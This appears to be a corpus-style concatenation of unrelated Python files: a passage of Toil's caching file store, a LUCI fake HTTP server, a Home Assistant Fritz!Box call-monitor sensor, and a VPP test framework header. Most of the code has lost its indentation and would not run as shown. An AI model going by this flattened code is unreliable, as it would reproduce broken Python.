# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'copying', fileStoreID, 'cached', 'uploadable', 'uploading'))])
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
while self.getCacheAvailable() < 0:
# Since we now have a copying reference, see if we have used too much space.
# If so, try to free up some space by deleting or uploading, but
# don't loop forever if we can't get enough.
self._tryToFreeUpSpace()
if self.getCacheAvailable() >= 0:
# We made room
break
# See if we have no other references and we can give away the file.
# Change it to downloading owned by us if we can grab it.
self._write([("""
                            UPDATE files SET owner = ?, state = ? WHERE files.id = ? AND files.state = ?
AND files.owner IS NULL AND NOT EXISTS (
SELECT NULL FROM refs WHERE refs.file_id = files.id AND refs.state != 'mutable'
)
""",
(me, 'downloading', fileStoreID, 'cached'))])
if self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath):
# We got ownership of the file and managed to give it away.
return localFilePath
# If we don't have space, and we couldn't make space, and we
# couldn't get exclusive control of the file to give it away, we
# need to wait for one of those people with references to the file
# to finish and give it up.
# TODO: work out if that will never happen somehow.
time.sleep(self.contentionBackoff)
# OK, now we have space to make a copy.
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Make the copy
atomic_copy(cachedPath, localFilePath)
# Change the reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))])
# Now we're done
return localFilePath
else:
# We didn't get a reference. Maybe it is still downloading.
logger.debug('Could not obtain reference to file %s', fileStoreID)
# Loop around again and see if either we can download it or we can get a reference to it.
# If we didn't get a download or a reference, adopt and do work
# from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.workDir, self.con)
self._stealWorkFromTheDead()
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Wait for other people's downloads to progress before re-polling.
time.sleep(self.contentionBackoff)
def _fulfillCopyingReference(self, fileStoreID, cachedPath, localFilePath):
"""
For use when you own a file in 'downloading' state, and have a
'copying' reference to it.
Makes a full copy from the cache, and changes 'downloading' file state
to 'cached', if space can be found, or gives away the cached copy if
space cannot be found.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
"""
if self.getCacheAvailable() < 0:
self._tryToFreeUpSpace()
if self.getCacheAvailable() < 0:
# No space for the cached copy and this copy. Give this copy away.
assert self._giveAwayDownloadingFile(fileStoreID, cachedPath, localFilePath)
return
# Otherwise we have space for the cached copy and the user copy.
# Expose this file as cached so other people can copy off of it too.
# Change state from downloading to cached
self._write([('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))])
if self.forceDownloadDelay is not None:
# Wait around to simulate a big file for testing
time.sleep(self.forceDownloadDelay)
# Make our copy
atomic_copy(cachedPath, localFilePath)
# Change our reference to mutable
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID))])
# Now we're done
return
def _giveAwayDownloadingFile(self, fileStoreID, cachedPath, localFilePath):
"""
Move a downloaded file in 'downloading' state, owned by us, from the cache to a user-specified destination path.
Used when there's no room for both a cached copy of the file and the user's actual mutable copy.
Returns true if the file was moved, and false if the file was not owned by us in 'downloading' state.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:return: True if the file is successfully moved. False if the file is not owned by us in 'downloading' state.
:rtype: bool
"""
# Work out who we are
me = get_process_name(self.workDir)
        # See if we actually own this file and can give it away
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?',
(fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# Now we have exclusive control of the cached copy of the file, so we can give it away.
# Don't fake a delay here; this should be a rename always.
# We are giving it away
shutil.move(cachedPath, localFilePath)
# Record that.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('mutable', localFilePath, fileStoreID)),
('DELETE FROM files WHERE id = ?', (fileStoreID,))])
# Now we're done
return True
else:
# We don't own this file in 'downloading' state
return False
def _createLinkFromCache(self, cachedPath, localFilePath, symlink=True):
"""
Create a hardlink or symlink from the given path in the cache to the
given user-provided path. Destination must not exist. Source must exist.
Only creates a symlink if a hardlink cannot be created and symlink is
true.
If no link can be created, returns False. Otherwise, returns True.
:param str cachedPath: absolute source path in the cache.
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: True if a symlink is allowed, False otherwise.
:return: True if the file is successfully linked. False if the file cannot be linked.
:rtype: bool
"""
assert os.path.exists(cachedPath), "Cannot create link to missing cache file %s" % cachedPath
try:
# Try and make the hard link.
os.link(cachedPath, localFilePath)
return True
except OSError:
if symlink:
# Or symlink
try:
os.symlink(cachedPath, localFilePath)
return True
except OSError:
return False
else:
return False
def _readGlobalFileWithCache(self, fileStoreID, localFilePath, symlink, readerID):
"""
Read a file, putting it into the cache if possible.
:param toil.fileStores.FileID or str fileStoreID: job store id for the file
:param str localFilePath: absolute destination path. Already known not to exist.
:param bool symlink: Whether a symlink is acceptable.
:param str readerID: Job ID of the job reading the file.
:return: An absolute path to a local, temporary copy of or link to the file keyed by fileStoreID.
:rtype: str
"""
# Now we know to use the cache, and that we don't require a mutable copy.
# Work out who we are
me = get_process_name(self.workDir)
# Work out where to cache the file if it isn't cached already
cachedPath = self._getNewCachingPath(fileStoreID)
# Start a loop until we can do one of these
while True:
# Try and create a downloading entry if no entry exists.
# Make sure to create a reference at the same time if it succeeds, to bill it against our job's space.
# Don't create the mutable reference yet because we might not necessarily be able to clear that space.
            logger.debug('Trying to make downloading file record and reference for id %s', fileStoreID)
self._write([('INSERT OR IGNORE INTO files VALUES (?, ?, ?, ?, ?)',
(fileStoreID, cachedPath, self.getGlobalFileSize(fileStoreID), 'downloading', me)),
('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND state = ? AND owner = ?',
(localFilePath, readerID, 'immutable', fileStoreID, 'downloading', me))])
# See if we won the race
self.cur.execute('SELECT COUNT(*) FROM files WHERE id = ? AND state = ? AND owner = ?', (fileStoreID, 'downloading', me))
if self.cur.fetchone()[0] > 0:
# We are responsible for downloading the file (and we have the reference)
logger.debug('We are now responsible for downloading file %s', fileStoreID)
# Make sure we have space for this download.
self._freeUpSpace()
# Do the download into the cache.
self._downloadToCache(fileStoreID, cachedPath)
# Try and make the link before we let the file go to cached state.
# If we fail we may end up having to give away the file we just downloaded.
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We made the link!
# Change file state from downloading to cached so other people can use it
self._write([('UPDATE files SET state = ?, owner = NULL WHERE id = ?',
('cached', fileStoreID))])
# Now we're done!
return localFilePath
else:
# We could not make a link. We need to make a copy.
# Change the reference to copying.
self._write([('UPDATE refs SET state = ? WHERE path = ? AND file_id = ?', ('copying', localFilePath, fileStoreID))])
# Fulfill it with a full copy or by giving away the cached copy
self._fulfillCopyingReference(fileStoreID, cachedPath, localFilePath)
# Now we're done
return localFilePath
else:
logger.debug('We already have an entry in the cache database for file %s', fileStoreID)
# A record already existed for this file.
# Try and create an immutable reference to an entry that
# is in 'cached' or 'uploadable' or 'uploading' state.
# It might be uploading because *we* are supposed to be uploading it.
logger.debug('Trying to make reference to file %s', fileStoreID)
self._write([('INSERT INTO refs SELECT ?, id, ?, ? FROM files WHERE id = ? AND (state = ? OR state = ? OR state = ?)',
(localFilePath, readerID, 'immutable', fileStoreID, 'cached', 'uploadable', 'uploading'))])
# See if we got it
self.cur.execute('SELECT COUNT(*) FROM refs WHERE path = ? and file_id = ?', (localFilePath, fileStoreID))
if self.cur.fetchone()[0] > 0:
# The file is cached and we can copy or link it
logger.debug('Obtained reference to file %s', fileStoreID)
# Get the path it is actually at in the cache, instead of where we wanted to put it
for row in self.cur.execute('SELECT path FROM files WHERE id = ?', (fileStoreID,)):
cachedPath = row[0]
if self._createLinkFromCache(cachedPath, localFilePath, symlink):
# We managed to make the link
return localFilePath
else:
# We can't make the link. We need a copy instead.
# We could change the reference to copying, see if
# there's space, make the copy, try and get ahold of
# the file if there isn't space, and give it away, but
# we already have code for that for mutable downloads,
# so just clear the reference and download mutably.
self._write([('DELETE FROM refs WHERE path = ? AND file_id = ?', (localFilePath, fileStoreID))])
return self._readGlobalFileMutablyWithCache(fileStoreID, localFilePath, readerID)
else:
logger.debug('Could not obtain reference to file %s', fileStoreID)
# If we didn't get a download or a reference, adopt and do work from dead workers and loop again.
# We may have to wait for someone else's download or delete to
# finish. If they die, we will notice.
self._removeDeadJobs(self.workDir, self.con)
self._stealWorkFromTheDead()
# We may have acquired ownership of partially-downloaded
# files, now in deleting state, that we need to delete
# before we can download them.
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Wait for other people's downloads to progress.
time.sleep(self.contentionBackoff)
def readGlobalFileStream(self, fileStoreID):
if str(fileStoreID) in self.filesToDelete:
# File has already been deleted
raise FileNotFoundError('Attempted to read deleted file: {}'.format(fileStoreID))
# TODO: can we fulfil this from the cache if the file is in the cache?
# I think we can because if a job is keeping the file data on disk due to having it open, it must be paying for it itself.
return self.jobStore.readFileStream(fileStoreID)
def deleteLocalFile(self, fileStoreID):
# What job are we operating as?
jobID = self.jobID
# What paths did we delete
deleted = []
# What's the first path, if any, that was missing? If we encounter a
# missing ref file, we will raise an error about it and stop deleting
# things.
missingFile = None
for row in self.cur.execute('SELECT path FROM refs WHERE file_id = ? AND job_id = ?', (fileStoreID, jobID)):
# Delete all the files that are references to this cached file (even mutable copies)
path = row[0]
if path.startswith(self.localTempDir):
# It is actually in the local temp dir where we are supposed to be deleting things
try:
os.remove(path)
except FileNotFoundError as err:
if err.errno != errno.ENOENT:
# Something else went wrong
raise
# Otherwise, file is missing, but that's fine.
missingFile = path
break
deleted.append(path)
if len(deleted) == 0 and not missingFile:
# We have to tell the user if they tried to delete 0 local copies.
# But if we found a missing local copy, go on to report that instead.
raise OSError(errno.ENOENT, "Attempting to delete local copies of a file with none: {}".format(fileStoreID))
for path in deleted:
# Drop the references
self._write([('DELETE FROM refs WHERE file_id = ? AND job_id = ? AND path = ?', (fileStoreID, jobID, path))])
logger.debug('Deleted local file %s for global file %s', path, fileStoreID)
# Now space has been revoked from the cache because that job needs its space back.
# That might result in stuff having to be evicted.
self._freeUpSpace()
if missingFile is not None:
# Now throw an error about the file we couldn't find to delete, if
# any. TODO: Only users who know to call deleteLocalFile will ever
# see this. We also should check at the end of the job to make
# sure all the refs are intact.
raise IllegalDeletionCacheError(missingFile)
def deleteGlobalFile(self, fileStoreID):
try:
# Delete local copies of the file
self.deleteLocalFile(fileStoreID)
except OSError as e:
if e.errno == errno.ENOENT:
# Turns out there weren't any
pass
else:
raise
# Work out who we are
me = get_process_name(self.workDir)
# Make sure nobody else has references to it
for row in self.cur.execute('SELECT job_id FROM refs WHERE file_id = ? AND state != ?', (fileStoreID, 'mutable')):
raise RuntimeError('Deleted file ID %s which is still in use by job %s' % (fileStoreID, row[0]))
# TODO: should we just let other jobs and the cache keep the file until
# it gets evicted, and only delete at the back end?
# Pop the file into deleting state owned by us if it exists
self._write([('UPDATE files SET state = ?, owner = ? WHERE id = ?', ('deleting', me, fileStoreID))])
# Finish the delete if the file is present
self._executePendingDeletions(self.workDir, self.con, self.cur)
# Add the file to the list of files to be deleted from the job store
# once the run method completes.
self.filesToDelete.add(str(fileStoreID))
self.logToMaster('Added file with ID \'%s\' to the list of files to be' % fileStoreID +
' globally deleted.', level=logging.DEBUG)
def exportFile(self, jobStoreFileID, dstUrl):
# First we need to make sure the file is actually in the job store if
# we have it cached and need to upload it.
# We don't have to worry about the case where a different process is
# uploading it because we aren't supposed to have the ID from them
# until they are done.
# For safety and simplicity, we just execute all pending uploads now.
self._executePendingUploads(self.con, self.cur)
# Then we let the job store export. TODO: let the export come from the
# cache? How would we write the URL?
self.jobStore.exportFile(jobStoreFileID, dstUrl)
def waitForCommit(self):
# We need to block on the upload thread.
# We may be called even if startCommit is not called. In that
# case, a new instance of this class should have been created by the
# worker and ought to pick up all our work by PID via the database, and
# this instance doesn't actually have to commit.
# If running in the destructor, we may already *be* in the commit
# thread. It can do some destructor work after it finishes its real
# work.
if self.commitThread is not None and self.commitThread is not threading.current_thread():
self.commitThread.join()
return True
def startCommit(self, jobState=False):
# If we already started a commit (maybe with a different parameter
# value?) wait on it, so we can't forget to join it later.
self.waitForCommit()
# Start the commit thread
self.commitThread = threading.Thread(target=self.startCommitThread, args=(jobState,))
self.commitThread.start()
def startCommitThread(self, jobState):
"""
Run in a thread to actually commit the current job.
"""
# Make sure the previous job is committed, if any
if self.waitForPreviousCommit is not None:
self.waitForPreviousCommit()
try:
# Reconnect to the database from this thread. The main thread can
# keep using self.con and self.cur. We need to do this because
# SQLite objects are tied to a thread.
con = sqlite3.connect(self.dbPath, timeout=SQLITE_TIMEOUT_SECS)
cur = con.cursor()
logger.debug('Committing file uploads asynchronously')
# Finish all uploads
self._executePendingUploads(con, cur)
# Finish all deletions out of the cache (not from the job store)
self._executePendingDeletions(self.workDir, con, cur)
if jobState:
# Do all the things that make this job not redoable
logger.debug('Committing file deletes and job state changes asynchronously')
# Indicate any files that should be deleted once the update of
# the job wrapper is completed.
self.jobGraph.filesToDelete = list(self.filesToDelete)
# Complete the job
self.jobStore.update(self.jobGraph)
# Delete any remnant jobs
list(map(self.jobStore.delete, self.jobsToDelete))
# Delete any remnant files
list(map(self.jobStore.deleteFile, self.filesToDelete))
# Remove the files to delete list, having successfully removed the files
if len(self.filesToDelete) > 0:
self.jobGraph.filesToDelete = []
# Update, removing emptying files to delete
self.jobStore.update(self.jobGraph)
except:
self._terminateEvent.set()
raise
@classmethod
def shutdown(cls, dir_):
"""
        :param dir_: The workflow directory for the node, which is used as the
cache directory, containing cache state database. Job
local temp directories will be removed due to their
appearance in the database.
"""
if os.path.isdir(dir_):
# There is a directory to clean up
# We need the database for the most recent workflow attempt so we
# can clean up job temp directories.
# We don't have access to a class instance, nor do we have access
# to the workflow attempt number that we would need in order to
# find the right database by just going to it. We can't have a link
# to the current database because opening SQLite databases under
# multiple names breaks SQLite's atomicity guarantees (because you
# can't find the journal).
# So we just go and find the cache-n.db with the largest n value,
# and use that.
dbFilename = None
dbAttempt = float('-inf')
for dbCandidate in os.listdir(dir_):
# For each thing in the directory
match = re.match('cache-([0-9]+).db', dbCandidate)
if match and int(match.group(1)) > dbAttempt:
# If it looks like a caching database and it has a higher
# number than any other one we have seen, use it.
dbFilename = dbCandidate
dbAttempt = int(match.group(1))
if dbFilename is not None:
# We found a caching database
logger.debug('Connecting to latest caching database %s for cleanup', dbFilename)
dbPath = os.path.join(dir_, dbFilename)
if os.path.exists(dbPath):
try:
# The database exists, see if we can open it
con = sqlite3.connect(dbPath, timeout=SQLITE_TIMEOUT_SECS)
except:
# Probably someone deleted it.
pass
else:
# We got a database connection
# Create the tables if they don't exist so deletion of dead
# jobs won't fail.
cls._ensureTables(con)
# Remove dead jobs and their job directories (not under the
# cache)
cls._removeDeadJobs(dir_, con)
con.close()
else:
logger.debug('No caching database found in %s', dir_)
# Whether or not we found a database, we need to clean up the cache
# directory. Delete the state DB if any and everything cached.
robust_rmtree(dir_)
def __del__(self):
"""
Cleanup function that is run when destroying the class instance that ensures that all the
file writing threads exit.
"""
self.waitForCommit()
@classmethod
def _removeDeadJobs(cls, workDir, con):
"""
Look at the state of all jobs registered in the database, and handle them
(clean up the disk)
:param str workDir: Toil work directory.
:param sqlite3.Connection con: Connection to the cache database.
"""
# Get a cursor
cur = con.cursor()
# Work out our process name for taking ownership of jobs
me = get_process_name(workDir)
# Get all the dead worker PIDs
workers = []
for row in cur.execute('SELECT DISTINCT worker FROM jobs WHERE worker IS NOT NULL'):
workers.append(row[0])
# Work out which of them are not currently running.
# TODO: account for PID reuse somehow.
deadWorkers = []
for worker in workers:
if not process_name_exists(workDir, worker):
deadWorkers.append(worker)
# Now we know which workers are dead.
# Clear them off of the jobs they had.
for deadWorker in deadWorkers:
cls._staticWrite(con, cur, [('UPDATE jobs SET worker = NULL WHERE worker = ?', (deadWorker,))])
if len(deadWorkers) > 0:
logger.debug('Reaped %d dead workers', len(deadWorkers))
while True:
# Find an unowned job.
# Don't take all of them; other people could come along and want to help us with the other jobs.
cur.execute('SELECT id FROM jobs WHERE worker IS NULL LIMIT 1')
row = cur.fetchone()
if row is None:
# We cleaned up all the jobs
break
jobID = row[0]
# Try to own this job
cls._staticWrite(con, cur, [('UPDATE jobs SET worker = ? WHERE id = ? AND worker IS NULL', (me, jobID))])
# See if we won the race
cur.execute('SELECT id, tempdir FROM jobs WHERE id = ? AND worker = ?', (jobID, me))
row = cur.fetchone()
if row is None:
# We didn't win the race. Try another one.
continue
# If we did win, delete the job and its files and temp dir
cls._removeJob(con, cur, jobID)
            logger.debug('Cleaned up orphaned job %s', jobID)
# Now we have cleaned up all the jobs that belonged to dead workers that were dead when we entered this function.
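# A standalone sketch (not part of the class above) of the claim-then-verify
# pattern that the cache database code relies on throughout: issue a conditional
# UPDATE that only matches if nobody owns the row, then re-query to see whether
# this process actually won the race. The table and column names below are
# illustrative only and are not the real cache schema.
def _example_claim_then_verify():
    import sqlite3
    con = sqlite3.connect(':memory:')
    cur = con.cursor()
    cur.execute('CREATE TABLE jobs (id TEXT PRIMARY KEY, worker TEXT)')
    cur.execute("INSERT INTO jobs VALUES ('job-1', NULL)")
    con.commit()
    me = 'worker-A'
    # Claim the job only if it is unowned; concurrent writers are serialized by
    # SQLite, so at most one such UPDATE can match the row.
    cur.execute('UPDATE jobs SET worker = ? WHERE id = ? AND worker IS NULL', (me, 'job-1'))
    con.commit()
    # Verify that we won before doing any cleanup work on the job.
    cur.execute('SELECT COUNT(*) FROM jobs WHERE id = ? AND worker = ?', ('job-1', me))
    return cur.fetchone()[0] > 0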
|
httpserver.py
|
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
import json
import logging
import threading
from six.moves import BaseHTTPServer
from six.moves import http_client
_STOP_EVENT = '/fakeserver/__stop__'
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handlers implements utility functions to help implementing a fake."""
### Public methods
def send_json(self, data):
"""Sends a JSON response."""
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
json.dump(data, self.wfile)
def send_octet_stream(self, data):
"""Sends a binary response."""
self.send_response(200)
self.send_header('Content-type', 'application/octet-stream')
self.end_headers()
self.wfile.write(data)
def read_body(self):
"""Reads the request body."""
return self.rfile.read(int(self.headers['Content-Length']))
def yield_body(self):
"""Yields the request body as 4kiB chunks."""
size = int(self.headers['Content-Length'])
while size:
chunk = min(4096, size)
yield self.rfile.read(chunk)
size -= chunk
### Overrides from BaseHTTPRequestHandler
def do_OPTIONS(self):
if self.path == _STOP_EVENT:
self.server.parent._stopped = True
self.send_octet_stream('')
def log_message(self, fmt, *args):
logging.info(
'%s - - [%s] %s', self.address_string(), self.log_date_time_string(),
fmt % args)
class Server(object):
"""Server implements a simple HTTP server to implement a fake."""
_HANDLER_CLS = None
def __init__(self):
assert issubclass(self._HANDLER_CLS, Handler), self._HANDLER_CLS
self._closed = False
self._stopped = False
self._server = BaseHTTPServer.HTTPServer(
('127.0.0.1', 0), self._HANDLER_CLS)
self._server.parent = self
self._server.url = self.url = 'http://127.0.0.1:%d' % (
self._server.server_port)
self._thread = threading.Thread(target=self._run, name='httpd')
self._thread.daemon = True
self._thread.start()
logging.info('%s', self.url)
def close(self):
assert not self._closed
self._closed = True
self._send_event(_STOP_EVENT)
self._thread.join()
def _run(self):
while not self._stopped:
self._server.handle_request()
self._server.server_close()
def _send_event(self, path):
conn = http_client.HTTPConnection(
'127.0.0.1:%d' % self._server.server_port, timeout=60)
try:
conn.request('OPTIONS', path)
conn.getresponse()
finally:
conn.close()
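# A minimal usage sketch for the scaffolding above. The _ExampleHandler and
# _ExampleServer names and the '/status' route are hypothetical; they only show
# how a test is expected to plug a Handler subclass into Server via _HANDLER_CLS.
class _ExampleHandler(Handler):
  def do_GET(self):
    if self.path == '/status':
      self.send_json({'ok': True})
    else:
      self.send_response(404)
      self.end_headers()
class _ExampleServer(Server):
  _HANDLER_CLS = _ExampleHandler
if __name__ == '__main__':
  server = _ExampleServer()  # binds 127.0.0.1 on a free port and starts serving
  logging.info('fake server listening at %s', server.url)
  server.close()             # sends the internal stop event and joins the thread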
|
sensor.py
|
"""Sensor to monitor incoming/outgoing phone calls on a Fritz!Box router."""
from datetime import datetime, timedelta
import logging
import queue
from threading import Event as ThreadingEvent, Thread
from time import sleep
from fritzconnection.core.fritzmonitor import FritzMonitor
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP,
)
import homeassistant.helpers.config_validation as cv
from .const import (
ATTR_PREFIXES,
CONF_PHONEBOOK,
CONF_PREFIXES,
DEFAULT_HOST,
DEFAULT_NAME,
DEFAULT_PHONEBOOK,
DEFAULT_PORT,
DEFAULT_USERNAME,
DOMAIN,
FRITZ_STATE_CALL,
FRITZ_STATE_CONNECT,
FRITZ_STATE_DISCONNECT,
FRITZ_STATE_RING,
FRITZBOX_PHONEBOOK,
ICON_PHONE,
MANUFACTURER,
SERIAL_NUMBER,
STATE_DIALING,
STATE_IDLE,
STATE_RINGING,
STATE_TALKING,
UNKNOWN_NAME,
)
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PHONEBOOK, default=DEFAULT_PHONEBOOK): cv.positive_int,
vol.Optional(CONF_PREFIXES): vol.All(cv.ensure_list, [cv.string]),
}
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Import the platform into a config entry."""
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_IMPORT}, data=config
)
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the fritzbox_callmonitor sensor from config_entry."""
fritzbox_phonebook = hass.data[DOMAIN][config_entry.entry_id][FRITZBOX_PHONEBOOK]
phonebook_name = config_entry.title
phonebook_id = config_entry.data[CONF_PHONEBOOK]
prefixes = config_entry.options.get(CONF_PREFIXES)
serial_number = config_entry.data[SERIAL_NUMBER]
host = config_entry.data[CONF_HOST]
port = config_entry.data[CONF_PORT]
name = f"{fritzbox_phonebook.fph.modelname} Call Monitor {phonebook_name}"
unique_id = f"{serial_number}-{phonebook_id}"
sensor = FritzBoxCallSensor(
name=name,
unique_id=unique_id,
fritzbox_phonebook=fritzbox_phonebook,
prefixes=prefixes,
host=host,
port=port,
)
hass.bus.async_listen_once(
EVENT_HOMEASSISTANT_STOP, sensor.async_will_remove_from_hass()
)
async_add_entities([sensor])
class FritzBoxCallSensor(SensorEntity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, unique_id, fritzbox_phonebook, prefixes, host, port):
"""Initialize the sensor."""
self._state = STATE_IDLE
self._attributes = {}
self._name = name.title()
self._unique_id = unique_id
self._fritzbox_phonebook = fritzbox_phonebook
self._prefixes = prefixes
self._host = host
self._port = port
self._monitor = None
async def async_added_to_hass(self):
"""Connect to FRITZ!Box to monitor its call state."""
_LOGGER.debug("Starting monitor for: %s", self.entity_id)
self._monitor = FritzBoxCallMonitor(
host=self._host,
port=self._port,
sensor=self,
)
self._monitor.connect()
async def async_will_remove_from_hass(self):
"""Disconnect from FRITZ!Box by stopping monitor."""
if (
self._monitor
and self._monitor.stopped
and not self._monitor.stopped.is_set()
and self._monitor.connection
and self._monitor.connection.is_alive
):
self._monitor.stopped.set()
self._monitor.connection.stop()
_LOGGER.debug("Stopped monitor for: %s", self.entity_id)
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def name(self):
"""Return name of this sensor."""
return self._name
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self._fritzbox_phonebook is not None
@property
def native_value(self):
"""Return the state of the device."""
return self._state
@property
def icon(self):
"""Return the icon of the sensor."""
return ICON_PHONE
@property
def extra_state_attributes(self):
"""Return the state attributes."""
if self._prefixes:
self._attributes[ATTR_PREFIXES] = self._prefixes
return self._attributes
@property
def device_info(self):
"""Return device specific attributes."""
return {
"name": self._fritzbox_phonebook.fph.modelname,
"identifiers": {(DOMAIN, self._unique_id)},
"manufacturer": MANUFACTURER,
"model": self._fritzbox_phonebook.fph.modelname,
"sw_version": self._fritzbox_phonebook.fph.fc.system_version,
}
@property
def unique_id(self):
"""Return the unique ID of the device."""
return self._unique_id
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self._fritzbox_phonebook is None:
return UNKNOWN_NAME
return self._fritzbox_phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self._fritzbox_phonebook is not None:
self._fritzbox_phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.connection = None
self.stopped = ThreadingEvent()
self._sensor = sensor
def connect(self):
"""Connect to the Fritz!Box."""
_LOGGER.debug("Setting up socket connection")
try:
self.connection = FritzMonitor(address=self.host, port=self.port)
kwargs = {"event_queue": self.connection.start()}
Thread(target=self._process_events, kwargs=kwargs).start()
except OSError as err:
self.connection = None
_LOGGER.error(
"Cannot connect to %s on port %s: %s", self.host, self.port, err
)
def _process_events(self, event_queue):
"""Listen to incoming or outgoing calls."""
_LOGGER.debug("Connection established, waiting for events")
while not self.stopped.is_set():
try:
event = event_queue.get(timeout=10)
except queue.Empty:
if not self.connection.is_alive and not self.stopped.is_set():
_LOGGER.error("Connection has abruptly ended")
_LOGGER.debug("Empty event queue")
continue
else:
_LOGGER.debug("Received event: %s", event)
self._parse(event)
sleep(1)
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == FRITZ_STATE_RING:
self._sensor.set_state(STATE_RINGING)
att = {
"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime,
"from_name": self._sensor.number_to_name(line[3]),
}
self._sensor.set_attributes(att)
elif line[1] == FRITZ_STATE_CALL:
self._sensor.set_state(STATE_DIALING)
att = {
"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime,
"to_name": self._sensor.number_to_name(line[5]),
}
self._sensor.set_attributes(att)
elif line[1] == FRITZ_STATE_CONNECT:
self._sensor.set_state(STATE_TALKING)
att = {
"with": line[4],
"device": line[3],
"accepted": isotime,
"with_name": self._sensor.number_to_name(line[4]),
}
self._sensor.set_attributes(att)
elif line[1] == FRITZ_STATE_DISCONNECT:
self._sensor.set_state(STATE_IDLE)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
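# For reference, a sketch of the semicolon-separated monitor lines that _parse()
# above consumes. The sample events and numbers are made up; only the field
# layout mirrors the parsing logic in this file.
#   "17.06.21 10:15:30;RING;0;0123456789;987654;SIP0;"   -> ringing (incoming)
#   "17.06.21 10:15:35;CONNECT;0;SIP0;0123456789;"       -> talking
#   "17.06.21 10:16:00;DISCONNECT;0;25;"                 -> idle, 25 s duration
def _example_parse_timestamp(raw_line):
    """Convert the timestamp of a monitor line to the ISO format used above."""
    from datetime import datetime as _dt
    fields = raw_line.split(";")
    return _dt.strptime(fields[0], "%d.%m.%y %H:%M:%S").strftime("%Y-%m-%dT%H:%M:%S")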
|
framework.py
|
#!/usr/bin/env python
from __future__ import print_function
import gc
import sys
import os
import select
import unittest
import tempfile
import time
import faulthandler
import random
import copy
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
from scapy.packet import Raw
from hook import StepHook, PollHook, VppDiedError
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_papi_provider import VppPapiProvider
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
getLogger, colorize
from vpp_object import VppObjectRegistry
if os.name == 'posix' and sys.version_info[0] < 3:
# using subprocess32 is recommended by python official documentation
# @ https://docs.python.org/2/library/subprocess.html
import subprocess32 as subprocess
else:
import subprocess
debug_framework = False
if os.getenv('TEST_DEBUG', "0") == "1":
debug_framework = True
import debug_internal
